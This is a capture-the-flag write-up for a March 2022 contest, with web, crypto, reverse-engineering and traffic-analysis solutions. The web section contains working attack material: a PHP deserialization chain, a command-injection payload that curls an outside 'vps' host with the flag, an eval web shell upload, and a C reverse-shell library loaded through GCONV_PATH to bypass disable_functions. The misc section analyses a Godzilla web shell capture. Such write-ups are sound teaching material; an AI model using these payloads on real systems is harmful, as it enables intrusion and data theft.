BUU March 2022 Monthly Contest (DASCTF)


web

ezpop

<?php
// Exploit generator for ezpop: builds the serialized object graph that
// walks the chain described below and prints it URL-encoded.

class what
{
    public $a;

    public function __construct(){
        $this->a = new fin();   // next link of the chain
    }
}


class mix{
    public $m1;

    public function __construct(){
        // get_flag() prepends '#', so the line is commented out; closing the
        // PHP block with ?> and reopening it with <?= gets the command executed
        $this->m1 = "?><?=system('cat H0mvz850F.php');";
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}



class fin{
    public $f1;

    public function __construct(){
        // callable array: [object, method]
        $this->f1 = array(new mix(), 'get_flag');
    }
}


$a = new fin();
$a->f1 = new what();
echo urlencode(serialize($a));

A cute challenge; finally a plain and simple POP chain.
fin -> (triggers __destruct) -> what -> (triggers __toString) -> fin -> (calls run) -> crow -> (triggers __invoke) -> fin -> (triggers __call) -> mix -> (get_flag)
Bypassing the hash sign: break out of the commented line with the ?><?php tags.

Once in, ls shows a lot of files. I first wanted to go for flag.sh, but figured it was probably used for building the challenge, so I ran cat /* and saw a congratulations message. It comes from the file H0mvz850F.php, which holds the flag inside a comment (so with a plain cat /* it gets parsed and the flag is not visible).

calc

Key source code

# Key source of the challenge (excerpt). The imports and the app object are
# added here so the snippet is complete; waf() is not shown, its blacklist is
# listed below.
import os
import time

from flask import Flask, request

app = Flask(__name__)


@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    # the user-controlled num lands unquoted inside a shell command line
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)     # must parse and evaluate without raising ...
            os.system(log)       # ... otherwise this line is never reached
        except:
            pass
        return str(data)
    else:
        return "waf!!"

The blacklist used by waf(num) is blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']

Analysis

data = eval(num)		# executes Python code
os.system(log)			# executes a system command

and the parameters inside log are under our control.

Since the blacklist filters the parentheses and the input is also forced to lower case, it cannot be bypassed;

I thought about RCE without parentheses and found it next to impossible: no parentheses means no function calls.

Supposedly exec 'code' also works, but I could not reproduce it because of the challenge environment.

So I gave up on RCE through eval.

Note that the parameters in log are controllable and system() executes the system command directly.

So the problem turns into: how to make "echo {0} {1} {2}> ./tmp/log.txt" achieve RCE.

Because of my own carelessness (objectively: no debugging in PyCharm and no print statements), I overlooked that if data = eval(num) raises a syntax error, os.system(log) never runs, so I was stuck for a long time.

For log to achieve RCE, eval has to comment something out, so I looked at comment markers: the # in Python and the # in a Unix shell behave differently.

unix

If the # is directly attached to a preceding character, it is treated as a literal character rather than a comment marker.


python

It is treated as a comment whether it is attached to a character or not.

So payload 1 came quickly:

1# `rce`

One more point:

In a Unix shell a backslash escapes # into an ordinary character,

whereas in Python a backslash cannot escape the comment marker.

Hence payload 2:

1 \# `rce`

Then consider exfiltration: spaces can be replaced with %09, backticks can be nested, and remember to add the escape.

Payload:

/calc?num=1%23`curl%09http://vps/?flag=\`cat%09Th1s*\``
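To put the calc behaviour in a defender's terms, here is an added Python example (my own code, not the challenge's): it models the two comment rules contrasted above, flags inputs that Python evaluates quietly while a shell would still act on, and shows the straightforward fix of writing the log line with file I/O instead of os.system. The function names, the regular expressions and the sample inputs are all mine.

```python
"""Added example: why the calc WAF cannot protect os.system(log), and a safer logger."""
import ast
import re
import time

# Shell constructs that still work inside an unquoted echo argument even though the
# challenge blacklist drops '(', ')', ';', '|' and '&' (my own list, not the challenge's).
SHELL_SUBSTITUTION = re.compile(r"[`$]")

# POSIX sh: '#' opens a comment only at the start of a word, i.e. at the very
# beginning of the line or right after whitespace.
SHELL_COMMENT = re.compile(r"(^|\s)#")


def python_accepts(expr: str) -> bool:
    """True if eval() would parse expr, so the challenge goes on to os.system(log).

    A Python '#' comments out the rest of the line wherever it appears, which is
    exactly why '1# ...' is a valid expression.
    """
    try:
        ast.parse(expr, mode="eval")
    except SyntaxError:
        return False
    return True


def shell_treats_as_comment(arg: str) -> bool:
    """True if sh would drop everything from the first word-initial '#' onwards."""
    return SHELL_COMMENT.search(arg) is not None


def crosses_interpreters(num: str) -> bool:
    """Review/detection heuristic: a value that Python evaluates cleanly, that the
    shell does not comment out, and that carries command-substitution characters."""
    return (
        python_accepts(num)
        and not shell_treats_as_comment(num)
        and SHELL_SUBSTITUTION.search(num) is not None
    )


def format_log_line(ip: str, num: str, ts=None) -> str:
    """Fixed version of the log: built in Python, a shell is never involved."""
    if ts is None:
        ts = time.strftime("%Y%m%d-%H%M%S", time.localtime())
    # repr() keeps quotes, backticks and newlines literal in the log file
    return "{0} {1} {2!r}\n".format(ts, ip, num)


def write_log(path: str, ip: str, num: str) -> str:
    """Append one log line with a plain file write and return it."""
    line = format_log_line(ip, num)
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(line)
    return line


if __name__ == "__main__":
    # constructed inputs, not taken from any capture
    for sample in ["1+1", "1 # `id`", "1# `id`", "1#`id`"]:
        print(f"{sample!r:12} python={python_accepts(sample)} "
              f"sh_comment={shell_treats_as_comment(sample)} "
              f"suspicious={crosses_interpreters(sample)}")
```

The heuristic is deliberately narrow: it only models unquoted sh word splitting, so it is a code-review aid for spotting values that cross from one interpreter into another, not a replacement for removing the os.system call.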

upgdload (post-contest)

During the contest I was stuck on calc and never looked at this one properly; it is actually not as hard as I imagined.

My findings:

It wants a PHP file, yet the file must not be recognised as one
Changing the content type to image/jpeg gets past that
eval is filtered…
Uploading phpinfo(); shows a lot of functions disabled through disable_functions

Teammate's findings:

eval and the "$" symbol are filtered; eval can be bypassed by changing case, and I thought of using base64_decode(JA==) to get around "$" and write a shell, but……

Key points:

  • phpinfo shows disable_functions, so exp.so has to be loaded
  • the functions filtered in the PHP file can all be bypassed with mixed case

How to bypass disable_functions:

Loading exp.so is the most thorough way; the fallback is to check whether any useful function is left unbanned. Here show_source and file_get_contents are not banned, so they are used to read the source.


eval itself is not filtered (the filter in index.php can be bypassed with mixed case).

Test first:

<?php
Eval(base64_decode('cGhwaW5mbygpOw==').';');
?>

This confirms a shell can be written through base64, Eval(base64_decode('ZXZhbCgkX1BPU1RbJ2EnXSk7').';');, and files can be read with show_source.

After writing the shell I considered using AntSword to bypass disable_functions, but the PHP versions AntSword supports are below 8, so it has to be done by hand.

First try reading /flag; that fails, so read index.php:

<?php
Eval(base64_decode('c2hvd19zb3VyY2UoJy4uL2luZGV4LnBocCcpOw==').';');
?>

After auditing index.php, prepare to upload exp.so. There are several ways; one is to first write (upload) a PHP file that accepts arbitrary uploads and then push exp.so through it. To stay clear of the disable_functions restriction, that file just mimics index.php, as follows:

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计,传个火?!
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
error_reporting(0);
// set the upload directory
define("UPLOAD_PATH", "/tmp");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_name = $_FILES['upload_file']['name'];
    $ext = pathinfo($file_name,PATHINFO_EXTENSION);

    $content = file_get_contents($temp_file);

    $new_file_name = $file_name;
    $img_path = UPLOAD_PATH . '/' . $new_file_name;
    if (move_uploaded_file($temp_file, $img_path)){
        $is_upload = true;
    } else {
        $msg = 'Upload Failed!';
        die();
    }
    echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

At first I failed many times, though, because the base64 was so long that some of its content happened to match the blacklist.


Once it succeeds, note down the file name.

Upload the shell mentioned earlier (verify that a=phpinfo(); executes).

Then:

a=include('php://filter/convert.base64-decode/resource=872b97ca230394aba8221f9a977fa931.php');


This includes the upload.php we wrote ourselves. I thought I could upload freely now, but it turned out the one-liner is "dynamic": while I upload a file the one-liner's command does not run (possibly a HackBar issue: the POST and the UI action cannot be synchronised).

So I had to write yet another file that includes our own upload.php:

<?php
Include(base64_decode('cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT03MDU3ZWEyYTBmMDNhMzFlNDAzZDcyZjZiZDA3OGJlMS5waHA='));

Then, following the CSDN post "Using GCONV_PATH with iconv to bypass disable_functions" by lesion__,

prepare to upload exp.so and gconv-modules.

exp.c

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'");
}

gcc exp.c -o exp.so -shared -fPIC

Another approach is to upload exp.so as a PHP file first and then rename it to exp.so, but the content of exp.so also gets banned when uploaded directly (it should be bypassable too; I tried base64 without success and gave up).

gconv-modules

Original template:

module  <CHARSET-NAME-UPPERCASE>//    INTERNAL    ../../../../../../../../tmp/<charset-name-lowercase>    2
module  INTERNAL    <CHARSET-NAME-UPPERCASE>//    ../../../../../../../../tmp/<charset-name-lowercase>    2

Modified for this challenge:

module  EXP//    INTERNAL    ../../../../../../../../tmp/exp    2 
module  INTERNAL   EXP//    ../../../../../../../../tmp/exp    2


Then trigger it through the shell we uploaded earlier, with the VPS listening on the port:

a=putenv("GCONV_PATH=/tmp/");include('php://filter/read=convert.iconv.exp.utf-8/resource=/tmp/exp.so');

Got a reverse shell.


No permission to read the flag, so look for SUID binaries:

find / -user root -perm -4000 -print 2>/dev/null

nl turns out to be SUID:

nl /flag


crypto

from gmpy2 import iroot

lans = []
rans = []
# the two big numbers handed out by the challenge
L, R = 15720197268945348388429429351303006925387388927292304717594511259390194100850889852747653387197205392431053069043632340374252629529419776874410817927770922310808632581666181899, 139721425176294317602347104909475448503147767726747922243703132013053043430193232376860554749633894589164137720010858254771905261753520854314908256431590570426632742469003
lans.append(L)
rans.append(R)
# run the Euclidean algorithm and record every (L, R) pair on the way down
while R != 0:
    temp = L % R
    L = R
    R = temp
    lans.append(L)
    rans.append(R)

lans.reverse()
rans.reverse()
L = lans
R = rans
# L = [1, 133317, 137492755075, 24316418691677517, 2694478038943586736328, 449366186013055209469307061, 424678007756192434300006917804988, 67952303343509961405922862120527631953, 10722465754210488857842384539746544074196670, 11050144307727113700681557772687121323224647867153, 11731219952144596819377276074864534430521345582519171825, 1501209023627137765492979001172871435243212151481455508796928, 240324048977128823416619126180138745528644638124733113619292984561, 241267801518963217329803327254141129383508497053892152707957403620167975, 32759342090485149698017824597983901673872922475506121132811189377165700630061, 5830376668137452804173383567980586211563348379884185911787096393298400138955904511, 6028609474886885541605763758989943967354486126474121155263363791803356933057570965004061, 973825402922208545745882895848854992390620148165434035074196392656950555217820068399921894085, 163194634853135239779527687110852732238802459017066087158243026833107794785760861815584881897662446, 19287157921091613716265688246942013055491723611322575658962386161345041119412098008892719335475158074595, 19304497076225869711849746340455541612339463403087957113496859433662333338211557279788474751973335123601723351, 19346619488865481717482094100686681292384530125288986759529832156605546935716879938892385301891033660176897469426477, 18822751726365286700612339826340137082689797360168751039458371318582478795225200597245268849966216725478600774872948579145,
#      17728566345779292838907909381612640668036643431117165902908905722221490552536570008262521006387722966311695266888986102760148482, 16713517279670522179142602316669021266414545548551242366498025076135157482269671171234675566764239156725485371108735804221489129242235, 3121683903445470016877317983137081025437455800044243487676152297523129079630621593231064333666220053742946978640516933836161839706107832842, 3038050870004975946934828279229998090001629942971672705946371743686684953534372767609080560274203027849883925292484330032865963662762987021572213, 363542281260527120641507826394376579427002124891256726811704925452455933892306777570036028677323021255266880206017499363363356743613369155668503557061, 41491807647864532203061547188977816042392604608090542687445179257686072390683442091157724792609311622180322599523073162631870961894947012137520634996058265, 7402968320895532116930768370098929764678065093602516751185225609968053961398195671796668035067389408306736179462173593882795916384659802649189800851665219198361, 935298420671754230833014738849730432588169238033228173469583131476419084794695511761146278309606770027490667271610796624269392034586175088396235641537756093736185366, 139721425176294317602347104909475448503147767726747922243703132013053043430193232376860554749633894589164137720010858254771905261753520854314908256431590570426632742469003, 15720197268945348388429429351303006925387388927292304717594511259390194100850889852747653387197205392431053069043632340374252629529419776874410817927770922310808632581666181899]
# R = [0, 1, 133317, 137492755075, 24316418691677517, 2694478038943586736328, 449366186013055209469307061, 424678007756192434300006917804988, 67952303343509961405922862120527631953, 10722465754210488857842384539746544074196670, 11050144307727113700681557772687121323224647867153, 11731219952144596819377276074864534430521345582519171825, 1501209023627137765492979001172871435243212151481455508796928, 240324048977128823416619126180138745528644638124733113619292984561, 241267801518963217329803327254141129383508497053892152707957403620167975, 32759342090485149698017824597983901673872922475506121132811189377165700630061, 5830376668137452804173383567980586211563348379884185911787096393298400138955904511, 6028609474886885541605763758989943967354486126474121155263363791803356933057570965004061, 973825402922208545745882895848854992390620148165434035074196392656950555217820068399921894085, 163194634853135239779527687110852732238802459017066087158243026833107794785760861815584881897662446, 19287157921091613716265688246942013055491723611322575658962386161345041119412098008892719335475158074595, 19304497076225869711849746340455541612339463403087957113496859433662333338211557279788474751973335123601723351, 19346619488865481717482094100686681292384530125288986759529832156605546935716879938892385301891033660176897469426477, 18822751726365286700612339826340137082689797360168751039458371318582478795225200597245268849966216725478600774872948579145,
#      17728566345779292838907909381612640668036643431117165902908905722221490552536570008262521006387722966311695266888986102760148482, 16713517279670522179142602316669021266414545548551242366498025076135157482269671171234675566764239156725485371108735804221489129242235, 3121683903445470016877317983137081025437455800044243487676152297523129079630621593231064333666220053742946978640516933836161839706107832842, 3038050870004975946934828279229998090001629942971672705946371743686684953534372767609080560274203027849883925292484330032865963662762987021572213, 363542281260527120641507826394376579427002124891256726811704925452455933892306777570036028677323021255266880206017499363363356743613369155668503557061, 41491807647864532203061547188977816042392604608090542687445179257686072390683442091157724792609311622180322599523073162631870961894947012137520634996058265, 7402968320895532116930768370098929764678065093602516751185225609968053961398195671796668035067389408306736179462173593882795916384659802649189800851665219198361, 935298420671754230833014738849730432588169238033228173469583131476419084794695511761146278309606770027490667271610796624269392034586175088396235641537756093736185366, 139721425176294317602347104909475448503147767726747922243703132013053043430193232376860554749633894589164137720010858254771905261753520854314908256431590570426632742469003]  # print(len(L))
ans = []
for i in range(1, len(L)):
    l = L[i]
    r = R[i]
    bf = R[i-1]        # the remainder of this division step
    l -= bf
    l //= r            # l is now the quotient of this step
    # walk the quotient down until it is a perfect cube; the cube root is the character
    while l:
        l -= 1
        root, exact = iroot(l, 3)
        if exact:
            print(chr(root), end="")
            ans.append(chr(root))
            break
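What the script above recovers are the partial quotients of the Euclidean algorithm on L/R: at every step L = q*R + r, and (L - r)//R is exactly q. The added example below (my own code, not the challenge's or the author's) makes the scheme explicit in both directions: an encoder that hides one character per quotient, assumed here to be q = c^3 + 1 so that the decoder's first downward step lands on a cube, and a decoder that reads the quotients back off the Euclidean trace. The encoder shape is an assumption; the challenge's encoder is not on the page.

```python
"""Added example: characters hidden in the quotients of the Euclidean algorithm."""


def icbrt(n: int):
    """Integer cube root of n >= 0 and whether n is a perfect cube (stand-in for gmpy2.iroot)."""
    lo, hi = 0, 1
    while hi ** 3 <= n:
        hi *= 2
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** 3 == n


def quotients(L: int, R: int):
    """Partial quotients of L/R (its continued-fraction expansion) from the Euclidean trace."""
    qs = []
    while R:
        qs.append(L // R)          # equals (L - L % R) // R, what the solve script computes
        L, R = R, L % R
    return qs


def from_quotients(qs, g: int = 1):
    """Rebuild the pair (L, R) whose Euclidean trace has exactly these quotients and gcd g."""
    a, b = g, 0
    for q in reversed(qs):
        a, b = q * a + b, a
    return a, b


def encode(msg: str):
    """Assumed encoder: one character per quotient, q = ord(c)^3 + 1."""
    return from_quotients([ord(c) ** 3 + 1 for c in msg])


def decode(L: int, R: int) -> str:
    """Decoder mirroring the solve script: step each quotient down until it is a perfect cube."""
    out = []
    for q in quotients(L, R):
        q -= 1
        while q > 0:
            root, exact = icbrt(q)
            if exact:
                out.append(chr(root))
                break
            q -= 1
    return "".join(out)


if __name__ == "__main__":
    L, R = encode("flag{euclid}")   # constructed message
    print(L, R)
    print(decode(L, R))
```

The point for anyone designing such a scheme: the quotient sequence is just the continued fraction of L/R, so anything placed in the quotients is recovered by whoever can run Euclid; the cube test only tells the decoder which offset was added.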

re

for ( i = 0; a2--; output[v4++] = miyaoliu[(miyaoliu[j] + miyaoliu[i]) % 256] )
  {
    i = (i + 1) % 256;
    j = (j + miyaoliu[i]) % 256;
    v3 = miyaoliu[i] + 66;
    miyaoliu[i] = miyaoliu[j] - 33;
    miyaoliu[i] ^= 2u;
    miyaoliu[j] = 5 * v3;
    miyaoliu[j] = miyaoliu[i] - 10;
    miyaoliu[j] += miyaoliu[i];
    miyaoliu[i] -= 18;
  }
  
  // rough simplification of the loop body:
    for ( i = 0; a2--; output[v4++] = myl[(myl[j] + myl[i]) % 256] )
  {
    i = (i + 1) % 256;
    j = (j + myl[i]) % 256;
    
    myl[j] = (myl[j]-33) ^2u-10+(myl[j]-33) ^2u;
    myl[i] = (myl[j]-33)^2u-18;
  }
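The rough rewrite above drops v3 and the 5 * v3 store because the original body overwrites both before they are ever read. As an added check (my own code, not from the post), both update rules are implemented in Python, where integers do not wrap, and compared on every possible value of the S[j] byte; the comparison also confirms that the incoming value of S[i] never influences the result.

```python
"""Added example: verify the dead-store simplification of the modified RC4 loop body."""


def step_original(si: int, sj: int):
    """Loop body exactly as in the decompiled code; returns the new (S[i], S[j])."""
    v3 = si + 66
    si = sj - 33
    si ^= 2
    sj = 5 * v3          # dead store: overwritten on the next line
    sj = si - 10
    sj += si
    si -= 18
    return si, sj


def step_simplified(si: int, sj: int):
    """Same update with the dead stores removed: everything depends on t = (S[j] - 33) ^ 2."""
    t = (sj - 33) ^ 2
    return t - 18, 2 * t - 10


def rules_agree() -> bool:
    """Exhaustively compare both rules over every byte value of S[j] and a sample of S[i]."""
    return all(
        step_original(si, sj) == step_simplified(si, sj)
        for sj in range(256)
        for si in (0, 1, 33, 127, 255)
    )


def si_is_irrelevant() -> bool:
    """The outgoing state never depends on the incoming S[i]."""
    return all(step_original(0, sj) == step_original(255, sj) for sj in range(256))


if __name__ == "__main__":
    print("rules agree:", rules_agree(), "| S[i] irrelevant:", si_is_irrelevant())
```

Python's XOR on negative integers matches what the C code does after its int/unsigned conversions (two's complement), so the comparison is faithful for the arithmetic itself; only the C-side index wraparound of % 256 on negative values is outside what this check models.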
  
  
#define _CRT_SECURE_NO_WARNINGS
#include <cstring>
#include <iostream>
using namespace std;

// Solver assembled from the decompiled routines: the binary derives a keystream
// (rc4Source) from a modified RC4 with the key "123456", and each plaintext byte
// is recovered as (ciphertext - 71) ^ keystream byte.

int Sbox[256];
int Tbox[256];
int rc4Source[72];

// identity permutation
int initSbox()
{
	int result = 0;
	for (int i = 0; i <= 255; ++i)
	{
		result = i;
		Sbox[i] = i;
	}
	return result;
}

// key repeated across 256 bytes, the usual RC4 key-scheduling input
size_t initTbox()
{
	char key[8];
	strcpy(key, "123456");
	key[7] = 0;
	size_t keylen = strlen(key);
	size_t result = keylen;
	for (int i = 0; i <= 255; ++i)
	{
		result = (unsigned char)key[i % keylen];
		Tbox[i] = (int)result;
	}
	return result;
}

// standard RC4 KSA
int initKey()
{
	int result = 0;
	int j = 0;
	for (int i = 0; i <= 255; ++i)
	{
		j = ((char)Tbox[i] + j + Sbox[i]) % 256;
		int t = Sbox[i];
		Sbox[i] = Sbox[j];
		result = j;
		Sbox[j] = t;
	}
	return result;
}

// modified PRGA: the swap is replaced by the arithmetic below, but the output
// byte is still Sbox[(Sbox[j] + Sbox[i]) % 256]
bool rc4()
{
	int inputLen = 42;
	int v5 = 0;
	int j = 0;
	int v4;
	int v2;
	bool result;
	for (int i = 0; ; rc4Source[v5++] = Sbox[(Sbox[j] + Sbox[i]) % 256])
	{
		v2 = inputLen--;
		result = v2 != 0;
		if (!result)
			break;
		i = (i + 1) % 256;
		j = (j + Sbox[i]) % 256;
		v4 = Sbox[i] + 66;
		Sbox[i] = Sbox[j] - 33;
		Sbox[i] ^= 2u;
		Sbox[j] = 5 * v4;
		Sbox[j] = Sbox[i] - 10;
		Sbox[j] += Sbox[i];
		Sbox[i] -= 18;
	}
	return result;
}

int main()
{
	// the 42 ciphertext bytes as signed chars, taken from the binary
	int v2[42] = { -61, -128, -43, -14, -101, 48, 11, -76, 85, -34, 34, -125, 47, -105,
	               -72, 32, 29, 116, -47, 1, 115, 26, -78, -56, -59, 116, -64, 91, -9, 15,
	               -45, 1, 85, -78, -92, -82, 123, -84, 92, 86, -68, 35 };

	initSbox();
	initTbox();
	initKey();
	rc4();

	for (int i = 0; i <= 41; i++)
	{
		int ch = ((v2[i] - 71) ^ (rc4Source[i] & 0xFF));   // low byte of the keystream word
		cout << (char)ch;
	}

	return 0;
}

misc

Au5t1n's secret

A quick look shows mostly HTTP, so this is probably an HTTP capture analysis challenge, which has a lot to do with web.


Search for status code 200.

[screenshot]

The screenshot above holds the important information, and so does the one below.

[screenshot]

fputs(fopen("didi.php","w"),base64_decode('<base64 blob omitted>'))

Decoding it reveals a web shell, in fact a small Godzilla shell.


The run function is guessed to be as follows (please point out any mistake); it does not affect the solve.

[screenshot of the reconstructed run function]

Beginners may not quite follow this encryption; it is just a simple XOR cipher, whose defining property is that XORing with the key a second time gives back the original.

demo

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

function decode($D,$K){
   for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$payloadName='payload';
$key='093c1c388069b7e1';
echo $payloadName;echo '<br>';
echo $a = encode($payloadName,$key);echo '<br>';
echo decode($a,$key);


We can see that payloads are POSTed to this shell afterwards.

http contains "didi"


Looking at it: wow, a big blob (encrypted). Try to decrypt it; decrypting directly or adding a base64 step does not work.

At this point:

[two screenshots]

Sorry, the reproduction failed here; normally a large shell would be extracted.

[image: https://raw.githubusercontent.com/hmt38/abcd/main/image-20220407172317469.png]

The key point is shown in the figure: the shell runs gzencode($result,6), so the result it finally returns differs from what Godzilla's direct decryption yields, and this step has to be added to the recovery; otherwise everything after it is garbage.
The flag is in stream 2079.

Because gzencode is needed, PHP is used:

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$key = '093c1c388069b7e1';
$data = 'JrhrMWMzODgwNnKp+yzEe/V+BmMGU1joHxkWZdbHzcwrzoftAY7cxGzLbZ/z8e38Bc7XradHhZL8tA3CudX1rOtnxaYjHjnm/Bobbrsl57NE9kJv7pW1HnCAP3JEZQBodnom+Oa9VxHxsQvwe+eHxRGsDsgXX/kE342APGVWZM51C80lwh+VYUoRSCt0GVFH7swmrIR5sydtIjeSUQGDV/lW1TtgNxB4Wa50Pmd0dzYwtSw/IdhvYu9WvbPVSfNjeEfjBkgofDUTdS3yMQRItrv3gdORz5ostfpb5+txYj3Oz/ebr6+kfEWz1bZ9KLfs7aHvzXdDaEkx465004EWloEyoDNjt1ohhnQ4Yjc=';
$decode = encode(base64_decode($data),$key);
$flag = base64_encode(gzdecode($decode));
echo $flag;
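The two PHP snippets above (the XOR demo and the gzencode-aware decoder) are the pieces of a parser for Godzilla PHP_XOR_BASE64 responses. Here they are combined into one added Python example (my own code, not the post's) that an analyst can point at captured responses: base64-decode, XOR with key[(i+1)&15] exactly as the shell does (in PHP the + binds tighter than the &), then gunzip. A wrap function exists only to build test data; KEY is the key from the capture above, FLAG_RESPONSE_B64 is the base64 the post printed, and the field layout used by parse_fields (name, 0x02, 4-byte little-endian length, value) is read off that decoded output and treated here as an assumption.

```python
"""Added example: unwrap a Godzilla PHP_XOR_BASE64 response the way the post's PHP does."""
import base64
import gzip

KEY = b"093c1c388069b7e1"   # key taken from the shell in the capture above

# the base64 the post obtained after XOR-decoding and gunzipping the response
FLAG_RESPONSE_B64 = "ZmlsZU5hbWUCJQAAAC93d3cvd3d3cm9vdC9jbXMuY29tL2UvYWRtaW4vZmxhZy56aXBmaWxlVmFsdWUC6QAAAFBLAwQUAAEAAADgvnNUSoE1gTQAAAAoAAAACAAAAGZsYWcudHh00Ij2ZFPCaGI0UraMI82E8sagnkvdbUoamST8kMciWCMbKXXcYaSAX1GLiv+iic51c+LRE1BLAQI/ABQAAQAAAOC+c1RKgTWBNAAAACgAAAAIACQAAAAAAAAAIAAAAAAAAABmbGFnLnR4dAoAIAAAAAAAAQAYAPJAEq+pO9gB8kASr6k72AEXBBOVqTvYAVBLBQYAAAAAAQABAFoAAABaAAAAHwBwYXNzd29yZCBpcyBtZDUoR29kemlsbGEnIGtleSkAbWV0aG9kTmFtZQIKAAAAdXBsb2FkRmlsZQ=="


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Godzilla's XOR: byte i is XORed with key[(i + 1) & 15]; applying it twice restores the input."""
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))


def unwrap_response(body_b64: str, key: bytes = KEY) -> bytes:
    """base64 -> XOR -> gunzip (the gzencode($result, 6) step the post found)."""
    return gzip.decompress(xor_stream(base64.b64decode(body_b64), key))


def wrap_response(result: bytes, key: bytes = KEY) -> str:
    """Inverse of unwrap_response; used here only to construct test data."""
    return base64.b64encode(xor_stream(gzip.compress(result, 6), key)).decode()


def parse_fields(blob: bytes) -> dict:
    """Split a decoded parameter map into {name: value}.

    Layout assumed from the decoded output above: name bytes, a 0x02 separator,
    a 4-byte little-endian length, then that many value bytes.
    """
    fields, pos = {}, 0
    while pos < len(blob):
        sep = blob.index(b"\x02", pos)
        name = blob[pos:sep].decode()
        length = int.from_bytes(blob[sep + 1:sep + 5], "little")
        start = sep + 5
        fields[name] = blob[start:start + length]
        pos = start + length
    return fields


def fields_from_plain_b64(plain_b64: str) -> dict:
    """Parse the base64 that the post's PHP printed (already XOR-decoded and gunzipped)."""
    return parse_fields(base64.b64decode(plain_b64))


if __name__ == "__main__":
    for name, value in fields_from_plain_b64(FLAG_RESPONSE_B64).items():
        print(f"{name}: {len(value)} bytes, starts with {value[:12]!r}")
```

On the flag response this separates the file path, the 233-byte zip and the method name, which is the same split the post later does by hand with base64 -d and an archiver.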

This yields a base64 string; just decode it, directly on Linux:

echo "ZmlsZU5hbWUCJQAAAC93d3cvd3d3cm9vdC9jbXMuY29tL2UvYWRtaW4vZmxhZy56aXBmaWxlVmFsdWUC6QAAAFBLAwQUAAEAAADgvnNUSoE1gTQAAAAoAAAACAAAAGZsYWcudHh00Ij2ZFPCaGI0UraMI82E8sagnkvdbUoamST8kMciWCMbKXXcYaSAX1GLiv+iic51c+LRE1BLAQI/ABQAAQAAAOC+c1RKgTWBNAAAACgAAAAIACQAAAAAAAAAIAAAAAAAAABmbGFnLnR4dAoAIAAAAAAAAQAYAPJAEq+pO9gB8kASr6k72AEXBBOVqTvYAVBLBQYAAAAAAQABAFoAAABaAAAAHwBwYXNzd29yZCBpcyBtZDUoR29kemlsbGEnIGtleSkAbWV0aG9kTmFtZQIKAAAAdXBsb2FkRmlsZQ==" | base64 -d > test

If you extract it with 7-Zip it must not carry a .zip suffix; WinRAR and binwalk don't care (so 7-Zip really is useless).

Extraction needs a password, and the hint says it is the MD5 of the Godzilla key. In one of the earlier streams a key file was uploaded with the content key is key1***, and it also says this is the Godzilla key, so we only need to find the match:

import hashlib
import itertools
import string

table = string.printable
key = '093c1c388069b7e1'   # the Godzilla key from the shell, expected to appear in md5(password)
# the uploaded key file says the password starts with key1; brute-force the last three characters
for i in itertools.product(table, repeat=3):
    passwd = 'key1' + ''.join(i)
    m = hashlib.md5(passwd.encode()).hexdigest()
    if key in m:
        print(m, passwd)
